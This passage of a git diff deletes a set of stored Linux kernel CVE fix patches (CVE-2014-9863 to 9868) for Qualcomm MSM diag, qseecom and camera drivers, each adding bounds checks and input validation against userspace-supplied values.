-@@ -192,7 +191,7 @@ extern void __sync_icache_dcache(pte_t pteval, unsigned long addr);
- static inline void set_pte_at(struct mm_struct *mm, unsigned long addr,
- pte_t *ptep, pte_t pte)
- {
-- if (pte_valid_ng(pte)) {
-+ if (pte_valid_user(pte)) {
- if (!pte_special(pte) && pte_exec(pte))
- __sync_icache_dcache(pte, addr);
- if (pte_dirty(pte) && pte_write(pte))
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch
deleted file mode 100644
index 093e6eca..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch
+++ /dev/null
@@ -1,123 +0,0 @@
-From 75eac48a48562f819f50eeff8369b296d89102d7 Mon Sep 17 00:00:00 2001
-From: Katish Paran
-Date: Tue, 24 Dec 2013 17:46:29 +0530
-Subject: diag: Safeguard for bound checks and integer underflow
-
-At certain point in diag driver there can be integer underflow
-and thus can lead to memory leak. Bound checks are placed to
-ensure correct behavior of condition statements.
-
-Change-Id: I47e02f764c2c7412db6f90fd42192fee32a761d3
-CRs-fixed: 549470
-Signed-off-by: Katish Paran
----
- drivers/char/diag/diag_debugfs.c | 15 ++++++++-------
- drivers/char/diag/diagchar_core.c | 15 +++++++++++++--
- drivers/char/diag/diagchar_hdlc.c | 4 ++--
- 3 files changed, 23 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index 4bbe948..d63d34b 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -197,7 +197,8 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- char __user *ubuf, size_t count, loff_t *ppos)
- {
- char *buf = NULL;
-- int bytes_remaining, bytes_written = 0, bytes_in_buf = 0, i = 0;
-+ unsigned int bytes_remaining, bytes_written = 0;
-+ unsigned int bytes_in_buf = 0, i = 0;
- struct diag_dci_data_info *temp_data = dci_data_smd;
- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-
-@@ -353,9 +354,9 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- char *buf;
- int ret = 0;
- int i;
-- int bytes_remaining;
-- int bytes_in_buffer = 0;
-- int bytes_written;
-+ unsigned int bytes_remaining;
-+ unsigned int bytes_in_buffer = 0;
-+ unsigned int bytes_written;
- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-
- if (diag_dbgfs_table_index >= diag_max_reg) {
-@@ -526,9 +527,9 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- char *buf;
- int ret;
- int i;
-- int bytes_remaining;
-- int bytes_in_buffer = 0;
-- int bytes_written;
-+ unsigned int bytes_remaining;
-+ unsigned int bytes_in_buffer = 0;
-+ unsigned int bytes_written;
- int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- int bytes_hsic_inited = 45;
- int bytes_hsic_not_inited = 410;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 38ca47b..ab68902 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -51,6 +51,7 @@ MODULE_DESCRIPTION("Diag Char Driver");
- MODULE_LICENSE("GPL v2");
- MODULE_VERSION("1.0");
-
-+#define MIN_SIZ_ALLOW 4
- #define INIT 1
- #define EXIT -1
- struct diagchar_dev *driver;
-@@ -1461,6 +1462,10 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- index = 0;
- /* Get the packet type F3/log/event/Pkt response */
- err = copy_from_user((&pkt_type), buf, 4);
-+ if (err) {
-+ pr_alert("diag: copy failed for pkt_type\n");
-+ return -EAGAIN;
-+ }
- /* First 4 bytes indicate the type of payload - ignore these */
- if (count < 4) {
- pr_err("diag: Client sending short data\n");
-@@ -1504,8 +1509,9 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- return err;
- }
- if (pkt_type == CALLBACK_DATA_TYPE) {
-- if (payload_size > driver->itemsize) {
-- pr_err("diag: Dropping packet, packet payload size crosses 4KB limit. Current payload size %d\n",
-+ if (payload_size > driver->itemsize ||
-+ payload_size <= MIN_SIZ_ALLOW) {
-+ pr_err("diag: Dropping packet, invalid packet size. Current payload size %d\n",
- payload_size);
- driver->dropped_count++;
- return -EBADMSG;
-@@ -1639,6 +1645,11 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- diag_get_remote(*(int *)driver->user_space_data_buf);
-
- if (remote_proc) {
-+ if (payload_size <= MIN_SIZ_ALLOW) {
-+ pr_err("diag: Integer underflow in %s, payload size: %d",
-+ __func__, payload_size);
-+ return -EBADMSG;
-+ }
- token_offset = 4;
- payload_size -= 4;
- buf += 4;
-diff --git a/drivers/char/diag/diagchar_hdlc.c b/drivers/char/diag/diagchar_hdlc.c
-index d5ba452..39f1f44 100644
---- a/drivers/char/diag/diagchar_hdlc.c
-+++ b/drivers/char/diag/diagchar_hdlc.c
-@@ -177,8 +177,8 @@ int diag_hdlc_decode(struct diag_hdlc_decode_type *hdlc)
- int msg_start;
-
- if (hdlc && hdlc->src_ptr && hdlc->dest_ptr &&
-- (hdlc->src_size - hdlc->src_idx > 0) &&
-- (hdlc->dest_size - hdlc->dest_idx > 0)) {
-+ (hdlc->src_size > hdlc->src_idx) &&
-+ (hdlc->dest_size > hdlc->dest_idx)) {
-
- msg_start = (hdlc->src_idx == 0) ? 1 : 0;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch
deleted file mode 100644
index b166953a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch
+++ /dev/null
@@ -1,343 +0,0 @@
-From a1124defc680055e2f2a8c8e3da4a94ca2ec842e Mon Sep 17 00:00:00 2001
-From: Mona Hossain
-Date: Tue, 1 Oct 2013 13:41:09 -0700
-Subject: qseecom: Add checks for API called in IOCTL
-
-Validate the caller is the right type for the IOCTL being
-issued and inputs are valid.
-
-Change-Id: Iad71f0f5ed4d53c5d011bd55cdf74ec053d09af5
-Signed-off-by: Mona Hossain
-Signed-off-by: Hariprasad Dhalinarasimha
----
- drivers/misc/qseecom.c | 165 +++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 159 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 7cc1c9f..51f0228 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -434,6 +434,12 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- if (copy_from_user(&req, (void __user *)argp, sizeof(req)))
- return -EFAULT;
-
-+ if ((req.ifd_data_fd <= 0) || (req.virt_sb_base == 0) ||
-+ (req.sb_len == 0)) {
-+ pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%x)\n",
-+ req.ifd_data_fd, req.sb_len, req.virt_sb_base);
-+ return -EFAULT;
-+ }
- /* Get the handle of the shared fd */
- data->client.ihandle = ion_import_dma_buf(qseecom.ion_clnt,
- req.ifd_data_fd);
-@@ -2680,6 +2686,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
-
- switch (cmd) {
- case QSEECOM_IOCTL_REGISTER_LISTENER_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("reg lstnr req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- pr_debug("ioctl register_listener_req()\n");
- atomic_inc(&data->ioctl_count);
- data->type = QSEECOM_LISTENER_SERVICE;
-@@ -2691,6 +2703,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_UNREGISTER_LISTENER_REQ: {
-+ if ((data->listener.id == 0) ||
-+ (data->type != QSEECOM_LISTENER_SERVICE)) {
-+ pr_err("unreg lstnr req: invalid handle (%d) lid(%d)\n",
-+ data->type, data->listener.id);
-+ ret = -EINVAL;
-+ break;
-+ }
- pr_debug("ioctl unregister_listener_req()\n");
- atomic_inc(&data->ioctl_count);
- ret = qseecom_unregister_listener(data);
-@@ -2701,6 +2720,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SEND_CMD_REQ: {
-+ if ((data->client.app_id == 0) ||
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("send cmd req: invalid handle (%d) app_id(%d)\n",
-+ data->type, data->client.app_id);
-+ ret = -EINVAL;
-+ break;
-+ }
- /* Only one client allowed here at a time */
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2713,6 +2739,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SEND_MODFD_CMD_REQ: {
-+ if ((data->client.app_id == 0) ||
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("send mdfd cmd: invalid handle (%d) appid(%d)\n",
-+ data->type, data->client.app_id);
-+ ret = -EINVAL;
-+ break;
-+ }
- /* Only one client allowed here at a time */
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2725,6 +2758,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_RECEIVE_REQ: {
-+ if ((data->listener.id == 0) ||
-+ (data->type != QSEECOM_LISTENER_SERVICE)) {
-+ pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+ data->type, data->listener.id);
-+ ret = -EINVAL;
-+ break;
-+ }
- atomic_inc(&data->ioctl_count);
- ret = qseecom_receive_req(data);
- atomic_dec(&data->ioctl_count);
-@@ -2734,6 +2774,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SEND_RESP_REQ: {
-+ if ((data->listener.id == 0) ||
-+ (data->type != QSEECOM_LISTENER_SERVICE)) {
-+ pr_err("send resp req: invalid handle (%d), lid(%d)\n",
-+ data->type, data->listener.id);
-+ ret = -EINVAL;
-+ break;
-+ }
- atomic_inc(&data->ioctl_count);
- ret = qseecom_send_resp();
- atomic_dec(&data->ioctl_count);
-@@ -2743,7 +2790,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SET_MEM_PARAM_REQ: {
-- data->type = QSEECOM_CLIENT_APP;
-+ if ((data->type != QSEECOM_CLIENT_APP) &&
-+ (data->type != QSEECOM_GENERIC) &&
-+ (data->type != QSEECOM_SECURE_SERVICE)) {
-+ pr_err("set mem param req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- pr_debug("SET_MEM_PARAM: qseecom addr = 0x%x\n", (u32)data);
- ret = qseecom_set_client_mem_param(data, argp);
- if (ret)
-@@ -2752,6 +2806,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_LOAD_APP_REQ: {
-+ if ((data->type != QSEECOM_GENERIC) &&
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("load app req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->type = QSEECOM_CLIENT_APP;
- pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%x\n", (u32)data);
- mutex_lock(&app_access_lock);
-@@ -2772,6 +2833,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_UNLOAD_APP_REQ: {
-+ if ((data->client.app_id == 0) ||
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("unload app req:invalid handle(%d) app_id(%d)\n",
-+ data->type, data->client.app_id);
-+ ret = -EINVAL;
-+ break;
-+ }
- pr_debug("UNLOAD_APP: qseecom_addr = 0x%x\n", (u32)data);
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2791,6 +2859,20 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_PERF_ENABLE_REQ:{
-+ if ((data->type != QSEECOM_GENERIC) &&
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("perf enable req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
-+ if ((data->type == QSEECOM_CLIENT_APP) &&
-+ (data->client.app_id == 0)) {
-+ pr_err("perf enable req:invalid handle(%d) appid(%d)\n",
-+ data->type, data->client.app_id);
-+ ret = -EINVAL;
-+ break;
-+ }
- atomic_inc(&data->ioctl_count);
- ret = qsee_vote_for_clock(data, CLK_DFAB);
- if (ret)
-@@ -2802,13 +2884,33 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_PERF_DISABLE_REQ:{
-+ if ((data->type != QSEECOM_SECURE_SERVICE) &&
-+ (data->type != QSEECOM_CLIENT_APP)) {
-+ pr_err("perf disable req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
-+ if ((data->type == QSEECOM_CLIENT_APP) &&
-+ (data->client.app_id == 0)) {
-+ pr_err("perf disable: invalid handle (%d)app_id(%d)\n",
-+ data->type, data->client.app_id);
-+ ret = -EINVAL;
-+ break;
-+ }
- atomic_inc(&data->ioctl_count);
-- qsee_disable_clock_vote(data, CLK_DFAB);
-- qsee_disable_clock_vote(data, CLK_SFPB);
-+ qsee_disable_clock_vote(data, CLK_DFAB);
-+ qsee_disable_clock_vote(data, CLK_SFPB);
- atomic_dec(&data->ioctl_count);
- break;
- }
- case QSEECOM_IOCTL_LOAD_EXTERNAL_ELF_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("load ext elf req: invalid client handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->type = QSEECOM_UNAVAILABLE_CLIENT_APP;
- data->released = true;
- mutex_lock(&app_access_lock);
-@@ -2821,6 +2923,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_UNLOAD_EXTERNAL_ELF_REQ: {
-+ if (data->type != QSEECOM_UNAVAILABLE_CLIENT_APP) {
-+ pr_err("unload ext elf req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->released = true;
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2842,9 +2950,15 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SEND_CMD_SERVICE_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("send cmd svc req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->type = QSEECOM_SECURE_SERVICE;
- if (qseecom.qsee_version < QSEE_VERSION_03) {
-- pr_err("SEND_CMD_SERVICE_REQ: Invalid qsee version %u\n",
-+ pr_err("SEND_CMD_SERVICE_REQ: Invalid qsee ver %u\n",
- qseecom.qsee_version);
- return -EINVAL;
- }
-@@ -2856,8 +2970,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_CREATE_KEY_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("create key req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- if (qseecom.qsee_version < QSEE_VERSION_05) {
-- pr_err("Create Key feature not supported in qsee version %u\n",
-+ pr_err("Create Key feature unsupported: qsee ver %u\n",
- qseecom.qsee_version);
- return -EINVAL;
- }
-@@ -2873,8 +2993,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_WIPE_KEY_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("wipe key req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- if (qseecom.qsee_version < QSEE_VERSION_05) {
-- pr_err("Wipe Key feature not supported in qsee version %u\n",
-+ pr_err("Wipe Key feature unsupported in qsee ver %u\n",
- qseecom.qsee_version);
- return -EINVAL;
- }
-@@ -2889,6 +3015,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SAVE_PARTITION_HASH_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("save part hash req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->released = true;
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2898,6 +3030,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_IS_ES_ACTIVATED_REQ: {
-+ if (data->type != QSEECOM_GENERIC) {
-+ pr_err("ES activated req: invalid handle (%d)\n",
-+ data->type);
-+ ret = -EINVAL;
-+ break;
-+ }
- data->released = true;
- mutex_lock(&app_access_lock);
- atomic_inc(&data->ioctl_count);
-@@ -2907,6 +3045,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_SEND_MODFD_RESP: {
-+ if ((data->listener.id == 0) ||
-+ (data->type != QSEECOM_LISTENER_SERVICE)) {
-+ pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+ data->type, data->listener.id);
-+ ret = -EINVAL;
-+ break;
-+ }
- /* Only one client allowed here at a time */
- atomic_inc(&data->ioctl_count);
- ret = qseecom_send_modfd_resp(data, argp);
-@@ -2917,6 +3062,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- case QSEECOM_IOCTL_UNPROTECT_BUF: {
-+ if ((data->listener.id == 0) ||
-+ (data->type != QSEECOM_LISTENER_SERVICE)) {
-+ pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+ data->type, data->listener.id);
-+ ret = -EINVAL;
-+ break;
-+ }
- /* Only one client allowed here at a time */
- atomic_inc(&data->ioctl_count);
- ret = qseecom_unprotect_buffer(argp);
-@@ -2927,6 +3079,7 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- break;
- }
- default:
-+ pr_err("Invalid IOCTL: %d\n", cmd);
- return -EINVAL;
- }
- return ret;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch
deleted file mode 100644
index a59ebe13..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From e65a876a155de945e306f2726f3a557415e6044e Mon Sep 17 00:00:00 2001
-From: Mona Hossain
-Date: Tue, 1 Oct 2013 14:08:20 -0700
-Subject: qseecom: Validate inputs from user space
-
-Validate send_cmd, send_modfd_cmd and send_mdfd_resp
-input parameters: cmd and response pointers and buffer
-lengths and offsets issued to modify data.
-
-Change-Id: I381836d08aaa48357486fbdc6a122eb5b42bfa0b
-Signed-off-by: Mona Hossain
----
- drivers/misc/qseecom.c | 35 +++++++++++++++++++++++++++++++++--
- 1 file changed, 33 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..97f3362 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1134,9 +1134,22 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- pr_err("cmd buffer or response buffer is null\n");
- return -EINVAL;
- }
-+ if (((uint32_t)req->cmd_req_buf < data->client.user_virt_sb_base) ||
-+ ((uint32_t)req->cmd_req_buf >= (data->client.user_virt_sb_base +
-+ data->client.sb_length))) {
-+ pr_err("cmd buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-+
-+
-+ if (((uint32_t)req->resp_buf < data->client.user_virt_sb_base) ||
-+ ((uint32_t)req->resp_buf >= (data->client.user_virt_sb_base +
-+ data->client.sb_length))){
-+ pr_err("response buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-
-- if (req->cmd_req_len <= 0 ||
-- req->resp_len <= 0 ||
-+ if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
- req->cmd_req_len > data->client.sb_length ||
- req->resp_len > data->client.sb_length) {
- pr_err("cmd buffer length or "
-@@ -1371,6 +1384,7 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- void __user *argp)
- {
- int ret = 0;
-+ int i;
- struct qseecom_send_modfd_cmd_req req;
- struct qseecom_send_cmd_req send_cmd_req;
-
-@@ -1384,6 +1398,14 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- send_cmd_req.resp_buf = req.resp_buf;
- send_cmd_req.resp_len = req.resp_len;
-
-+ /* validate offsets */
-+ for (i = 0; i < MAX_ION_FD; i++) {
-+ if (req.ifd_data[i].cmd_buf_offset >= req.cmd_req_len) {
-+ pr_err("Invalid offset %d = 0x%x\n",
-+ i, req.ifd_data[i].cmd_buf_offset);
-+ return -EINVAL;
-+ }
-+ }
- ret = __qseecom_update_cmd_buf(&req, false, data, false);
- if (ret)
- return ret;
-@@ -2001,11 +2023,20 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- void __user *argp)
- {
- struct qseecom_send_modfd_listener_resp resp;
-+ int i;
-
- if (copy_from_user(&resp, argp, sizeof(resp))) {
- pr_err("copy_from_user failed");
- return -EINVAL;
- }
-+ /* validate offsets */
-+ for (i = 0; i < MAX_ION_FD; i++) {
-+ if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) {
-+ pr_err("Invalid offset %d = 0x%x\n",
-+ i, resp.ifd_data[i].cmd_buf_offset);
-+ return -EINVAL;
-+ }
-+ }
- __qseecom_update_cmd_buf(&resp, false, data, true);
- qseecom.send_resp_flag = 1;
- wake_up_interruptible(&qseecom.send_resp_wq);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch
deleted file mode 100644
index cd2c9791..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 8e6daae70422ad35146a87700e6634a747d1ff5d Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman
-Date: Tue, 16 Jul 2013 11:23:47 -0700
-Subject: msm: camera: Bound check num_cid from userspace in csid driver
-
-Upper and lower bound checks are enforced for num_cid
-which is passed from userspace with lower as 1 and
-max of 16.
-
-Change-Id: Ic5456289cb2f2b4ea17610a7672eb2c5225b7954
-Signed-off-by: Hariram Purushothaman
----
- drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index 9aca234..229fdb2 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -440,7 +440,7 @@ static long msm_csid_cmd(struct csid_device *csid_dev, void *arg)
- case CSID_CFG: {
- struct msm_camera_csid_params csid_params;
- struct msm_camera_csid_vc_cfg *vc_cfg = NULL;
-- int32_t i = 0;
-+ int8_t i = 0;
- if (copy_from_user(&csid_params,
- (void *)cdata->cfg.csid_params,
- sizeof(struct msm_camera_csid_params))) {
-@@ -448,6 +448,13 @@ static long msm_csid_cmd(struct csid_device *csid_dev, void *arg)
- rc = -EFAULT;
- break;
- }
-+ if (csid_params.lut_params.num_cid < 1 ||
-+ csid_params.lut_params.num_cid > 16) {
-+ pr_err("%s: %d num_cid outside range\n",
-+ __func__, __LINE__);
-+ rc = -EINVAL;
-+ break;
-+ }
- for (i = 0; i < csid_params.lut_params.num_cid; i++) {
- vc_cfg = kzalloc(csid_params.lut_params.num_cid *
- sizeof(struct msm_camera_csid_vc_cfg),
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch
deleted file mode 100644
index 88d4f24d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9867/ANY/0001.patch
+++ /dev/null
@@ -1,108 +0,0 @@
-From 322c518689a7f820165ca4c5d6b750b02ac34665 Mon Sep 17 00:00:00 2001
-From: Jim Rasche
-Date: Mon, 22 Jul 2013 15:03:50 -0700
-Subject: msm:camera: Fix multiple bounds check
-
-Added bounds check to user input num_streams at several location,
-without checking a position outside array could be dereferenced
-
-Change-Id: I6e82d8b51e4ec6772316c7daef243240c029db96
-Signed-off-by: Jim Rasche
----
- .../platform/msm/camera_v2/isp/msm_isp_axi_util.c | 46 ++++++++++++++++++++++
- 1 file changed, 46 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-index 5b7658d..746425b 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_axi_util.c
-@@ -300,7 +300,16 @@ int msm_isp_axi_check_stream_state(
- struct msm_vfe_axi_stream *stream_info;
- enum msm_vfe_axi_state valid_state =
- (stream_cfg_cmd->cmd == START_STREAM) ? INACTIVE : ACTIVE;
-+
-+ if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+ > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
- stream_info = &axi_data->stream_info[
- HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
- spin_lock_irqsave(&stream_info->lock, flags);
-@@ -840,7 +849,16 @@ static void msm_isp_update_camif_output_count(
- int i;
- struct msm_vfe_axi_stream *stream_info;
- struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+ if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+ return;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+ > MAX_NUM_STREAM) {
-+ return;
-+ }
- stream_info =
- &axi_data->stream_info[
- HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
-@@ -1020,7 +1038,16 @@ static int msm_isp_start_axi_stream(struct vfe_device *vfe_dev,
- uint32_t wm_reload_mask = 0x0;
- struct msm_vfe_axi_stream *stream_info;
- struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+ if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+ > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
- stream_info = &axi_data->stream_info[
- HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
- src_state = axi_data->src_info[
-@@ -1073,7 +1100,16 @@ static int msm_isp_stop_axi_stream(struct vfe_device *vfe_dev,
- uint8_t wait_for_complete = 0;
- struct msm_vfe_axi_stream *stream_info;
- struct msm_vfe_axi_shared_data *axi_data = &vfe_dev->axi_data;
-+
-+ if (stream_cfg_cmd->num_streams > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < stream_cfg_cmd->num_streams; i++) {
-+ if (HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])
-+ > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
- stream_info = &axi_data->stream_info[
- HANDLE_TO_IDX(stream_cfg_cmd->stream_handle[i])];
-
-@@ -1158,8 +1194,18 @@ int msm_isp_update_axi_stream(struct vfe_device *vfe_dev, void *arg)
- return -EBUSY;
- }
-
-+ /*num_stream is uint32 and update_info[] bound by MAX_NUM_STREAM*/
-+ if (update_cmd->num_streams > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
-+
- for (i = 0; i < update_cmd->num_streams; i++) {
- update_info = &update_cmd->update_info[i];
-+ /*check array reference bounds*/
-+ if (HANDLE_TO_IDX(update_info->stream_handle)
-+ > MAX_NUM_STREAM) {
-+ return -EINVAL;
-+ }
- stream_info = &axi_data->stream_info[
- HANDLE_TO_IDX(update_info->stream_handle)];
- if (stream_info->state != ACTIVE &&
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch
deleted file mode 100644
index 6107cf1c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9868/ANY/0001.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 1f274b74c00187ba1c379971503f51944148b22f Mon Sep 17 00:00:00 2001
-From: Lakshmi Narayana Kalavala
-Date: Thu, 25 Jul 2013 15:55:03 -0700
-Subject: msm: camera: Fix possible out of bound writes in csi driver
-
-The value csi_lane_mask which is uint16_t is controllable from userspace.
-The while loop can loop for 2^16 - 1, Hence extract the required
-bit combination from the userspace argument, used it for further
-processing.
-
-CRs-Fixed: 511976
